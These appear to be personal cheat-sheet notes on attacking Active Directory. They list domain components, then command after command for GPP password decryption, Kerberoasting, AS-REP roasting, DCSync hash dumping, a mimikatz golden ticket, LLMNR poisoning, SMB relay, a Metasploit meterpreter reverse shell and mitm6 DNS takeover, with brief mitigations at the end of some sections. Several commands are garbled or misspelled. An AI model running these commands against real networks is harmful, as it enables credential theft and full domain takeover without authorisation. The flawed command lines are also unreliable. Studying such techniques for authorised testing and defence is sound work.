Basic AD Pentesting

AD Components

Domain Controller

• Server with AD DS server role.

• Hosts a copy of the AD DS directory store.

• Provides authentication and authorization services.

• Replicates updates to other domain controllers.

• Allows administrative access to manage resources.

AD DS Data Store

• Consists of the Ntds.dit file (password hashes, sensitive information).

• Stored in the %SystemRoot%\NTDS folder on all domain controllers.

AD Logical Components

• Schema:

  • Defines objects that can be stored in the directory.

  • Enforces rules about object creation and configuration.

• Domains:

  • Group and manage objects in an organization.

  • May include child domains and trusts with other domains.

• Trees:

  • Hierarchy of domains in AD DS.

  • Can have child domains.

  • Creates two-way transitive trust with other domains.

• Forests:

  • Collection of Trees.

  • Shares common schema and configuration.

  • Enables trusts between domains in the forest.

  • Shares enterprise admin, schema admins groups.

• Organizational Units (OUs):

  • Containers that can contain users, groups, computers, and other OUs.

• Trusts:

  • Provide mechanisms for users to gain access.

• Objects:

  • Users, contacts, groups, computers, printers, shared folders, etc.

Initial Attack Vectors

• Begin with mitm6 or Responder.

• Run a scan to generate traffic.

• Look for default credentials on web logins.

• Target websites in scope (http_version).

• Consider printers, Jenkins, etc.

• Think outside the box.

Additional Resources:

• Top Five Ways I Got Domain Admin on Your Internal Network Before Lunch (2018 Edition)

Enumeration

Kerberos Enumeration

1. Nmap Scan:

   nmap -T5 10.10.10.100

2. SMB Enumeration:

   smbclient -L \\\\10.10.10.100\\

3. Replication:

   smbclient \\\\10.10.10.100\\Replication

   • In the Replication directory, look for Groups.xml file.

4. Extracting cPassword:

   • Copy the cPassword attribute from Groups.xml.

   • Use gpp-decrypt to decrypt the password:

     gpp-decrypt <cpassword>

5. Psexec.py with Hash:

   psexec.py active.htp /svc_tags:<cpassword>@10.10.10.100

6. Kerberoasting with GetUserSPNs.py:

   python3 GetUserSPNs.py limbawy.local/ahmed:Password -dc-ip 192.168.1.10 -request

   • Save the hash to TGS.txt.

   • Crack the hash using john:

     sudo john TGS.txt

7. ASREPRoast with GetNPUsers.py:

   python3 GetNPUsers.py limbawy.local/levi -dc-ip 192.168.1.10

   • Save the hash to TGT.txt.

   • Crack the hash using john:

     sudo john TGT.txt

8. BloodHound for Full Control:

   bloodhound-python -u Levi -p Password -ns 192.168.1.10 -d limbawy.local -c All

9. DC Sync Attack with secretsdump.py:

   python3 secretsdump.py limbawy.local/Levi:Password@192.168.1.10 -use-vss

10. Golden Ticket with mimikatz:

    mimikatz # kerberos:golden /domain:limbawy.local /sid:S-1-5-21-1314916712-2918817657-636196047 /user:Administrator:13dadc78472c366a7cd1cea42347af18 /krbtgt:b3a2e1bb5cb5e94a27f1884d86bca6c2 /ptt

LMNR

• LMNR (Link-Local Multicast Name Resolution) Attack Workflow:

  1. Use responder:

     responder -I tun0 -rdw

  2. Wait for events.

  3. Retrieve hashes.

  4. Crack hashes using hashcat:

     hashcat -m 5600 hashes.txt rockyou.txt

• Defense:

  • Disable LMNR and NBT-NS.

  • Enforce strong user passwords.

SMB

1. Identify SMB Signing:

   nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24

2. SMB Relay Attack Workflow:

   • Edit responder.conf to turn off SMB and HTTP.

   • Run responder:

     responder -I eth0 -rdw -w

   • Run ntlmrelayx.py:

     ntlmrelayx.py -tf targets.txt -smb2support

3. Gaining a Shell using MSF:

   msfconsole
   search psexec
   set rhost target_ip
   set smbdomain <domain_here>
   set smpass <password_u_cracked_here>
   set payload windows/x64/meterpreter/reverse_tcp
   set lhost eth0
   run

4. Other Ways to Psexec:

   psexec.py marvel.local/fcastle:password1:@192.168.57.141
   smbexec.py marvel.local/fcastle:password1:@192.168.57.141
   wmiexec.py marvel.local/fcastle:password1:@192.168.57.141

• Mitigation:

  • Enable SMB Signing.

  • Disable NTLM authentication.

  • Implement account tiering.

  • Restrict local admin access.

IPv6 Attacks

1. Install mitm6:

   pip3 install mitm6

2. Setup LDAP for DNS Takeover:

   • Go to Server Manager.

   • Add the AD Cert Services feature.

3. DNS Takeover via mitm6 Workflow:

   mitm6 -d marvel.local

4. Delegate Impersonation Attack with ntlnrelayx.py:

   ntlmrelayx.py -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme

   • The worst of both worlds: Combining NTLM Relaying and Kerberos delegation

• Mitigation:

  • Disable IPv6.

  • Disable WPAD.

  • Enable LDAP signing.

  • Consider administrative users in the protected users group.

Passback Attack

• How to Hack Through a Pass-back Attack